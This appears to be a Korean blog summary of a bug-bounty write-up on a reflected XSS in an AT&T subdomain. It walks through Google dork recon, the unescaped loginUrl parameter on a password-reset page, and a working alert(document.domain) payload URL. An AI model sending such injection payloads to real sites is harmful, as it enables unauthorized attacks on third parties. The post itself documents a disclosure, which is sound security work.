Hack The World
Reflected XSS In AT&T 본문
미국 주식회사의 사이트인 AT&T 에서 발견된 XSS 인거같다.
원본 : https://medium.com/@godofdarkness.msf/reflected-xss-in-at-t-7f1bdd10d8f7
Reflected XSS In AT&T
Hi today. I want to share how i found xss in AT&T. I find subdomain using google dork.
medium.com
우선 헌터는 google dork 을 이용하여 서브도메인
site : *.att.com 을 검색하였다.
그결과 ilm.att.com 사이트를 발견하였고
이사이트에서
https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=https://ilm.aatt.com
으로 연결되는 사이트를 찾아고 소스를보니
var jsuerName=";
var jsloginUrl = 'https://ilm.att.com'; 으로 되있는것을 발견.
https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl='">
으로 테스를 해보니
var jsuserName = '';
var jsloginUrl = ''"></;';
다음과 같이 소스코드가 나오면서 취약점을 발견.
xss payload 를 삽입.
https://ilm.att.com/bizportal/spp/forgotPassword?loginUrl=x';alert(document.domain);x='
그 결과 다음과 같이 xss 성공
소스코드를 보니
var jsuserName = '';
var jsloginUrl = 'x';alert(document.domain);x='';
다음과 같음.